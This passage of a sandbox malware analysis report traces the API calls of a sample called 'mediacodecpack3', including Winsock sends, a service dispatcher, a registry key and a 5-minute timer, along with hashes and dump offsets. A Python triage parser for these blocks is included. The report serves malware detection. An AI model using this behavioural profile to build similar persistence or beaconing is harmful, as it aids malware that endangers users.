                                                                                            • Opcode Fuzzy Hash: 2b10a1f7c2b1f0600840dc9aead60e26cacef0549d1b594724e00e56d505a95f
                                                                                            • Instruction Fuzzy Hash: AA1106B5604208ABDF219F14DC85FAA3BEAEF05354F1044A6FE12CB2D0C779D860CB94
                                                                                            APIs
                                                                                            • __beginthreadex.LIBCMT ref: 02BA1116
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000002,02B9998D,00000000), ref: 02BA1147
                                                                                            • ResumeThread.KERNELBASE(?,?,?,?,?,00000002,02B9998D,00000000), ref: 02BA1155
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseHandleResumeThread__beginthreadex
                                                                                            • String ID:
                                                                                            • API String ID: 1685284544-0
                                                                                            • Opcode ID: 0284460f675dff0ef54532d208632e6c86a1a33dd6d7b1d5406f7e4069630070
                                                                                            • Instruction ID: 03f8c88e761cb2e5785acaf30936ee35c4fcc38a5cc816f9b30752f1b3e027ce
                                                                                            • Opcode Fuzzy Hash: 0284460f675dff0ef54532d208632e6c86a1a33dd6d7b1d5406f7e4069630070
                                                                                            • Instruction Fuzzy Hash: 7BF06271250200ABEB209E6CDC90F9573E9EF49725F2409AAF658D7290D7A1A8D29B90
                                                                                            APIs
                                                                                            • InterlockedIncrement.KERNEL32(02BC529C), ref: 02B91ABA
                                                                                            • WSAStartup.WS2_32(00000002,00000000), ref: 02B91ACB
                                                                                            • InterlockedExchange.KERNEL32(02BC52A0,00000000), ref: 02B91AD7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Interlocked$ExchangeIncrementStartup
                                                                                            • String ID:
                                                                                            • API String ID: 1856147945-0
                                                                                            • Opcode ID: b5a69f8a6b2001dfc0fa324be79471db127d49a259f8baf2e67dc98289963a0f
                                                                                            • Instruction ID: 5ab5b9c4ee05f3b3284a7fb4a2d928a9f24952745344dac0eac40a33bb7fd5af
                                                                                            • Opcode Fuzzy Hash: b5a69f8a6b2001dfc0fa324be79471db127d49a259f8baf2e67dc98289963a0f
                                                                                            • Instruction Fuzzy Hash: DDD05E31D846085BE23176A4AD0EB7877ACD705712FD00695FDB9DA1C0EAD2692087A7
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002BC8000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC8000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2bc8000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: InternetOpen
                                                                                            • String ID: U[6
                                                                                            • API String ID: 2038078732-2089642770
                                                                                            • Opcode ID: 358883196de9751098e698ad59654cbae274b78773688df4f4d97c785f25f8e4
                                                                                            • Instruction ID: e8d88152404cc63a7b4ba454b790abc830ad23c88b96bb19ba72e26d7fa821b5
                                                                                            • Opcode Fuzzy Hash: 358883196de9751098e698ad59654cbae274b78773688df4f4d97c785f25f8e4
                                                                                            • Instruction Fuzzy Hash: 54515CB260C600AFE7156F19ECC5BBAFBE9EF98320F06092DE7D583700D63558548A97
                                                                                            APIs
                                                                                            • GetStartupInfoA.KERNEL32(0040BC70), ref: 0040D55C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoStartup
                                                                                            • String ID: 3h
                                                                                            • API String ID: 2571198056-227859408
                                                                                            • Opcode ID: 024e0850f827c435b8a5028a910d45a29312e1de5a17c3597f685f170630041f
                                                                                            • Instruction ID: 03e41e0e2fbe8f3f1350c05a2512de981e85b09ededd3a12d9f5b7d8ff28fd69
                                                                                            • Opcode Fuzzy Hash: 024e0850f827c435b8a5028a910d45a29312e1de5a17c3597f685f170630041f
                                                                                            • Instruction Fuzzy Hash: 604117B1908246CBD7149B68DE313E677B0E702321F14423E9553B31E2D77C444AEB5E
                                                                                            APIs
                                                                                            • RegCreateKeyExA.KERNELBASE(80000002,Software\MCodec56,00000000), ref: 0040DC43
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID: Software\MCodec56
                                                                                            • API String ID: 2289755597-4241566752
                                                                                            • Opcode ID: f87b7628d3f1b6c01b43e6fa8910d4b250f6bb28f3b3560bcda25592cc6c599b
                                                                                            • Instruction ID: 93077888e0bbcd1fcb5d665c645348ae1621a215fb68b31d801dbfa4ad4509b8
                                                                                            • Opcode Fuzzy Hash: f87b7628d3f1b6c01b43e6fa8910d4b250f6bb28f3b3560bcda25592cc6c599b
                                                                                            • Instruction Fuzzy Hash: 2CD0A931A9C20AB8F2002A924D0EB721514B708B94F60083B2452B30C6C2B8844BD25B
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID: MediaCodecPack
                                                                                            • API String ID: 3535843008-199385074
                                                                                            • Opcode ID: d1c8d0ac3f500a16e2a1ba87aa97279d6ff8767d919a51834699a3c776ea22fd
                                                                                            • Instruction ID: f19db8fe7a91f9339945a850f06442911a31ce16223db01261e704d0ab5d2cd6
                                                                                            • Opcode Fuzzy Hash: d1c8d0ac3f500a16e2a1ba87aa97279d6ff8767d919a51834699a3c776ea22fd
                                                                                            • Instruction Fuzzy Hash: B4B01221A4C510D7E5282BD05B09D6E34015544720732003B7683391E34FFD040B73EF
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02B94BF2
                                                                                              • Part of subcall function 02B91BA7: __EH_prolog.LIBCMT ref: 02B91BAC
                                                                                              • Part of subcall function 02B91BA7: RtlEnterCriticalSection.NTDLL ref: 02B91BBC
                                                                                              • Part of subcall function 02B91BA7: RtlLeaveCriticalSection.NTDLL ref: 02B91BEA
                                                                                              • Part of subcall function 02B91BA7: RtlEnterCriticalSection.NTDLL ref: 02B91C13
                                                                                              • Part of subcall function 02B91BA7: RtlLeaveCriticalSection.NTDLL ref: 02B91C56
                                                                                              • Part of subcall function 02B9D0FC: __EH_prolog.LIBCMT ref: 02B9D101
                                                                                              • Part of subcall function 02B9D0FC: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02B9D180
                                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 02B94CF2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                                                            • String ID:
                                                                                            • API String ID: 1927618982-0
                                                                                            • Opcode ID: ebaae471146b093d87b6ccc274cd2077875160fc17dd5cbae2f2dbdd923c8c7a
                                                                                            • Instruction ID: 825c03fb4e8a94dcdf36d8c2ebd37ffde7687b84e005b01f64282b96c32f4e12
                                                                                            • Opcode Fuzzy Hash: ebaae471146b093d87b6ccc274cd2077875160fc17dd5cbae2f2dbdd923c8c7a
                                                                                            • Instruction Fuzzy Hash: 635115B5D042489FDF15DFA8C484AEEBBF5EF08314F1481AAE905AB252DB709A45CF50
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000), ref: 02B92D47
                                                                                            • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02B92D5C
                                                                                              • Part of subcall function 02B9950D: WSAGetLastError.WS2_32(00000000,?,?,02B92A51), ref: 02B9951B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$Send
                                                                                            • String ID:
                                                                                            • API String ID: 1282938840-0
                                                                                            • Opcode ID: 1d09ae63b8a12813a06105ea1a5f8d90db08efd17e1a88ad3da769d2599e38fc
                                                                                            • Instruction ID: c3cb1d6203e49b5d2343f4ab950229d00aeda0f5d43c919669a3e7d4ccfab69d
                                                                                            • Opcode Fuzzy Hash: 1d09ae63b8a12813a06105ea1a5f8d90db08efd17e1a88ad3da769d2599e38fc
                                                                                            • Instruction Fuzzy Hash: 9B0184B5900205BFDB205F98D84496BBBEDEF453A472005BEE85983240DB709D40CBA1
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseValue
                                                                                            • String ID:
                                                                                            • API String ID: 3132538880-0
                                                                                            • Opcode ID: 8d1ffd4e1db30a3de41eb7b4220ffc1c9475fd541d97c53cfaeaf051eb009d7e
                                                                                            • Instruction ID: 4c22f98cd7c9e98f077693477baae5e06b4a06b3414cbbd33dac7c18dcee98c1
                                                                                            • Opcode Fuzzy Hash: 8d1ffd4e1db30a3de41eb7b4220ffc1c9475fd541d97c53cfaeaf051eb009d7e
                                                                                            • Instruction Fuzzy Hash: 34018C7541A5918FC709CB24AFB06A93FB5D64A740705107DD1D6AB273D6384C05EB1D
                                                                                            APIs
                                                                                            • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040DF4C
                                                                                            • lstrcmpiW.KERNELBASE(?,/chk), ref: 0040E028
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: CtrlDispatcherServiceStartlstrcmpi
                                                                                            • String ID: /chk
                                                                                            • API String ID: 369133424-3837807730
                                                                                            • Opcode ID: bf94812ca6c332d091ad4b42a885db31f7de2e204c73ca7d6ec59c21a7b81bd2
                                                                                            • Instruction ID: 9673a0ded5c8b983d3e052be02671165733424ab24c3791a3204680fb7a92e49
                                                                                            • Opcode Fuzzy Hash: bf94812ca6c332d091ad4b42a885db31f7de2e204c73ca7d6ec59c21a7b81bd2
                                                                                            • Instruction Fuzzy Hash: 1DF02434A08356DFDB058BA089146967BB4FB02310B0580FFC486EA197C7388806DF49
                                                                                            APIs
                                                                                            • WSASetLastError.WS2_32(00000000), ref: 02B9740B
                                                                                            • shutdown.WS2_32(?,00000002), ref: 02B97414
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: ErrorLastshutdown
                                                                                            • String ID:
                                                                                            • API String ID: 1920494066-0
                                                                                            • Opcode ID: 8aea91fdcab2d5a9fbaa6a23ad099fbd57261815606166a1579a144a0fee015d
                                                                                            • Instruction ID: 8e4c91e07c815d14f39e10e0e92bb7f93146b872bc35a2dff3c31929e759a1dd
                                                                                            • Opcode Fuzzy Hash: 8aea91fdcab2d5a9fbaa6a23ad099fbd57261815606166a1579a144a0fee015d
                                                                                            • Instruction Fuzzy Hash: B7F0B471A043108FCB109F24D410B5ABBE5EF0A374F4488ADED9997381DB70AC00CB91
                                                                                            APIs
                                                                                            • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402A7F,00000000), ref: 00403B75
                                                                                              • Part of subcall function 00403A1C: GetVersionExA.KERNEL32 ref: 00403A3B
                                                                                            • HeapDestroy.KERNEL32 ref: 00403BB4
                                                                                              • Part of subcall function 00403F3B: HeapAlloc.KERNEL32(00000000,00000140,00403B9D,000003F8), ref: 00403F48
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$AllocCreateDestroyVersion
                                                                                            • String ID:
                                                                                            • API String ID: 2507506473-0
                                                                                            • Opcode ID: 41655e9e9c0e703031797a4b7b8f832f06af8b7de0b6b38e25141203e3b9edaa
                                                                                            • Instruction ID: 13181fdbc77bd6b5762d4953551df96dffaf81345f3f43d3ea23e6f05a00c699
                                                                                            • Opcode Fuzzy Hash: 41655e9e9c0e703031797a4b7b8f832f06af8b7de0b6b38e25141203e3b9edaa
                                                                                            • Instruction Fuzzy Hash: 58F065706547029ADB101F319E4572A3EA89B4075BF10447FFD00F51D1EFBC9784951D
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02B9511E
                                                                                              • Part of subcall function 02B93D7E: htons.WS2_32(?), ref: 02B93DA2
                                                                                              • Part of subcall function 02B93D7E: htonl.WS2_32(00000000), ref: 02B93DB9
                                                                                              • Part of subcall function 02B93D7E: htonl.WS2_32(00000000), ref: 02B93DC0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: htonl$H_prologhtons
                                                                                            • String ID:
                                                                                            • API String ID: 4039807196-0
                                                                                            • Opcode ID: 930b490073ccfd9ff733ea50792e59a2cd8a98da46c1e1db495ddd2b01427ab5
                                                                                            • Instruction ID: 62e96f9926daf0e20897fc4ceba717a140237f159ac2b4bbcc2bce963b57a09d
                                                                                            • Opcode Fuzzy Hash: 930b490073ccfd9ff733ea50792e59a2cd8a98da46c1e1db495ddd2b01427ab5
                                                                                            • Instruction Fuzzy Hash: 2B8148B1D0424E8ECF16DFA8D190AEEBBB5EF48314F1481AAD851B7240EB765A45CF70
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02B9D9CA
                                                                                              • Part of subcall function 02B91A01: TlsGetValue.KERNEL32 ref: 02B91A0A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prologValue
                                                                                            • String ID:
                                                                                            • API String ID: 3700342317-0
                                                                                            • Opcode ID: 34f4d30c9555b5a8703f0e21a72a83d5f0ca13b05f089ac003bfe29edd11c18e
                                                                                            • Instruction ID: fc99999d1c705fa88b001ac8d77919b7c544772a0d403522420f7c0a763f9788
                                                                                            • Opcode Fuzzy Hash: 34f4d30c9555b5a8703f0e21a72a83d5f0ca13b05f089ac003bfe29edd11c18e
                                                                                            • Instruction Fuzzy Hash: CA2132B190420AAFDF04DFA9D440AFEBBF9EF49314F1041AEE915E7240D771A910CBA1
                                                                                            APIs
                                                                                            • SHGetSpecialFolderPathA.SHELL32 ref: 02BCC5AF
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002BC8000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC8000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2bc8000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: FolderPathSpecial
                                                                                            • String ID:
                                                                                            • API String ID: 994120019-0
                                                                                            • Opcode ID: 2d145bd48dfcade9531d59655a458408fc6c5bc9404775150100288841eeeafd
                                                                                            • Instruction ID: b1cb271ff99689142053d72e58b853349b200323095c15ef318187aab8025e79
                                                                                            • Opcode Fuzzy Hash: 2d145bd48dfcade9531d59655a458408fc6c5bc9404775150100288841eeeafd
                                                                                            • Instruction Fuzzy Hash: 34113AF250C504EFE705AE09EC81BBEBBE9EB94760F16482DE2C9C7310E63198518B56
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02B9D55A
                                                                                              • Part of subcall function 02B926DB: RtlEnterCriticalSection.NTDLL(?), ref: 02B92706
                                                                                              • Part of subcall function 02B926DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02B9272B
                                                                                              • Part of subcall function 02B926DB: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02BB3173), ref: 02B92738
                                                                                              • Part of subcall function 02B926DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02B92778
                                                                                              • Part of subcall function 02B926DB: RtlLeaveCriticalSection.NTDLL(?), ref: 02B927D9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                            • String ID:
                                                                                            • API String ID: 4293676635-0
                                                                                            • Opcode ID: 8dae16b8e202e82bb964299e8bcd6da9c8ab51d3ce59b303d2e094b2c42c4c6c
                                                                                            • Instruction ID: 4fe51c390cda420f7755bb7ce3ce605de0441e0cc4988817bae8f0e1a7e71885
                                                                                            • Opcode Fuzzy Hash: 8dae16b8e202e82bb964299e8bcd6da9c8ab51d3ce59b303d2e094b2c42c4c6c
                                                                                            • Instruction Fuzzy Hash: 06019EB1900B089FC329CF5AC540996FBE5FF88314B15C5EE98599B722E7B19A40CF94
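                                                                                             The function blocks above are the raw material a triager works from: the service-dispatcher block (StartServiceCtrlDispatcherA followed by an lstrcmpiW against "/chk"), the Winsock blocks (shutdown/WSASetLastError, htons/htonl), and the waitable-timer block whose SetWaitableTimer call passes 000493E0 as its third argument (lPeriod, in milliseconds: 0x493E0 = 300000 ms, i.e. a 5-minute period). The following is an added example, not Joe Sandbox code and not part of this report: a small Python parser that turns "APIs" blocks in this text layout into records (direct calls, subcalls with their caller address, dump offset, API/String IDs) and runs a few assumed triage rules over them. The SAMPLE text is excerpted from three blocks on this page; the rule names in RULES and the choice of which API combinations to flag are the author's assumptions.

```python
"""Parse Joe Sandbox 'APIs' function blocks and flag API patterns worth a second look.

Added example, not Joe Sandbox code. SAMPLE is excerpted from three function blocks
of this report (fuzzy-hash lines omitted); the RULES dictionary is an assumed,
deliberately small triage rule set.
"""
import re

SAMPLE = """\
APIs
• StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0040DF4C
• lstrcmpiW.KERNELBASE(?,/chk), ref: 0040E028
Strings
Memory Dump Source
• Source File: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
Similarity
• API ID: CtrlDispatcherServiceStartlstrcmpi
• String ID: /chk
• API String ID: 369133424-3837807730
APIs
• WSASetLastError.WS2_32(00000000), ref: 02B9740B
• shutdown.WS2_32(?,00000002), ref: 02B97414
Memory Dump Source
• Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
Yara matches
Similarity
• API ID: ErrorLastshutdown
• String ID:
• API String ID: 1920494066-0
APIs
• __EH_prolog.LIBCMT ref: 02B9D55A
  • Part of subcall function 02B926DB: RtlEnterCriticalSection.NTDLL(?), ref: 02B92706
  • Part of subcall function 02B926DB: CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02B9272B
  • Part of subcall function 02B926DB: SetWaitableTimer.KERNELBASE(?,?,000493E0,00000000,00000000,00000000), ref: 02B92778
Memory Dump Source
• Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
Yara matches
Similarity
• API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
• String ID:
• API String ID: 4293676635-0
"""

# One API line: optional "Part of subcall function <addr>:", then Api.MODULE(args), ref: <addr>.
# Parentheses and the comma before "ref:" are optional (e.g. "__EH_prolog.LIBCMT ref: ...").
API_RE = re.compile(
    r"^\s*[•*-]\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
SRC_RE = re.compile(
    r"Source File: (?P<file>\S+), Offset: (?P<off>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)"
)
ID_RE = re.compile(r"^\s*[•*-]\s*(?P<key>API String ID|API ID|String ID):\s*(?P<val>.*)$")


def parse_blocks(text):
    """Split the report on 'APIs' header lines; return one dict per function block."""
    blocks, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = {"direct": [], "subcalls": [], "file": None, "offset": None, "pe": None, "ids": {}}
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            call = {
                "api": m["api"], "module": m["mod"], "ref": m["ref"].upper(),
                "args": [a.strip() for a in m["args"].split(",")] if m["args"] else [],
            }
            if m["caller"]:
                call["caller"] = m["caller"].upper()
                cur["subcalls"].append(call)
            else:
                cur["direct"].append(call)
            continue
        m = SRC_RE.search(line)
        if m:
            cur["file"], cur["offset"], cur["pe"] = m["file"], m["off"].upper(), m["pe"] == "true"
            continue
        m = ID_RE.match(line)
        if m:
            cur["ids"][m["key"]] = m["val"].strip()
    return blocks


def all_calls(block):
    return block["direct"] + block["subcalls"]


# Assumed triage rules (name -> predicate over one parsed block).
RULES = {
    "service_control": lambda b: any(c["api"].startswith("StartServiceCtrlDispatcher") for c in all_calls(b)),
    "winsock": lambda b: any(c["module"] == "WS2_32" for c in all_calls(b)),
    "waitable_timer": lambda b: {"CreateWaitableTimerA", "SetWaitableTimer"} <= {c["api"] for c in all_calls(b)},
}


def flags(block):
    return sorted(name for name, pred in RULES.items() if pred(block))


def timer_period_ms(block):
    """lPeriod is SetWaitableTimer's third argument, in milliseconds; None if absent or unresolved."""
    for c in all_calls(block):
        if c["api"] == "SetWaitableTimer" and len(c["args"]) >= 3 and c["args"][2] != "?":
            return int(c["args"][2], 16)
    return None


def triage(text):
    """One summary row per block: (dump offset, triggered rules, timer period in ms, String ID)."""
    return [(b["offset"], flags(b), timer_period_ms(b), b["ids"].get("String ID", ""))
            for b in parse_blocks(text)]


if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row)
```

Running it over the excerpt yields one row per block: the service-dispatcher function at image offset 00400000 with the "/chk" string, the Winsock shutdown helper in the unbacked 02B91000 region, and the timer function with a decoded period of 300000 ms. Feeding the full report text in is the useful case: grouping rows by offset separates the on-disk PE (based on PE: true) from the unpacked region (based on PE: false), which is where the Winsock and timer code lives here.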
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad
                                                                                            • String ID:
                                                                                            • API String ID: 1029625771-0
                                                                                            • Opcode ID: 81c2b33cd779f3770bbade04ffdf75582417cc2f6e97285ea47be6d284f00c90
                                                                                            • Instruction ID: 93b9b1974ed41d96b605e6f2543649dec7ed103e9ca7e63d5c00ca61ae8303bf
                                                                                            • Opcode Fuzzy Hash: 81c2b33cd779f3770bbade04ffdf75582417cc2f6e97285ea47be6d284f00c90
                                                                                            • Instruction Fuzzy Hash: C701EF71E10219CFDB08DF98D8A1AEDB3B1FB09300F55856AE452B72A0C738A848CB15
                                                                                            APIs
                                                                                            • __EH_prolog.LIBCMT ref: 02B9D339
                                                                                              • Part of subcall function 02BA27C5: _malloc.LIBCMT ref: 02BA27DD
                                                                                              • Part of subcall function 02B9D555: __EH_prolog.LIBCMT ref: 02B9D55A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_2b91000_mediacodecpack3.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: H_prolog$_malloc
                                                                                            • String ID:
                                                                                            • API String ID: 4254904621-0
                                                                                            • Opcode ID: bd29dd3f3d99c9a3e523deb9be6e8557face9a968983088db49fe2bd96a2f9d5
                                                                                            • Instruction ID: a37f0f47690082d3a1cdb3d99c46fc0d4f2eaea0669615c2233061f5cae30bd2
                                                                                            • Opcode Fuzzy Hash: bd29dd3f3d99c9a3e523deb9be6e8557face9a968983088db49fe2bd96a2f9d5
                                                                                            • Instruction Fuzzy Hash: 0FE08C71A0410AABEF1AEF68981177D77A2EF44701F0085EEA809A2240EBB18A008A10
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2980624065.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000002.00000002.2980624065.000000000040B000.00000040.00000001.01000000.00000009.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_400000_mediacodecpack3.jbxd
                                                                                            Similarity
                                                                                            • API ID: CopyFile
                                                                                            • String ID:
                                                                                            • API String ID: 1304948518-0
                                                                                            • Opcode ID: 77cee4b6d02c89c83c6c8276e285ea2bf1f63efd6c688e4d25e383538686599e
                                                                                            • Instruction ID: ad16e0f938f8472db79b29402d126077d4e772f8cfe65a76779df96d21c81dee
                                                                                            • Opcode Fuzzy Hash: 77cee4b6d02c89c83c6c8276e285ea2bf1f63efd6c688e4d25e383538686599e
                                                                                            • Instruction Fuzzy Hash: 3AD0A7B548800EBDD708C6419D89EE9239CD708719F2000BB7249F30D0DE3849595A3D
                                                                                            APIs
                                                                                              • Part of subcall function 02BA48CA: __getptd_noexit.LIBCMT ref: 02BA48CB
                                                                                              • Part of subcall function 02BA48CA: __amsg_exit.LIBCMT ref: 02BA48D8
                                                                                              • Part of subcall function 02BA24A3: __getptd_noexit.LIBCMT ref: 02BA24A7
                                                                                              • Part of subcall function 02BA24A3: __freeptd.LIBCMT ref: 02BA24C1
                                                                                              • Part of subcall function 02BA24A3: RtlExitUserThread.NTDLL(?,00000000,?,02BA2483,00000000), ref: 02BA24CA
                                                                                            • __XcptFilter.LIBCMT ref: 02BA248F
                                                                                              • Part of subcall function 02BA7954: __getptd_noexit.LIBCMT ref: 02BA7958
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2982015287.0000000002B91000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
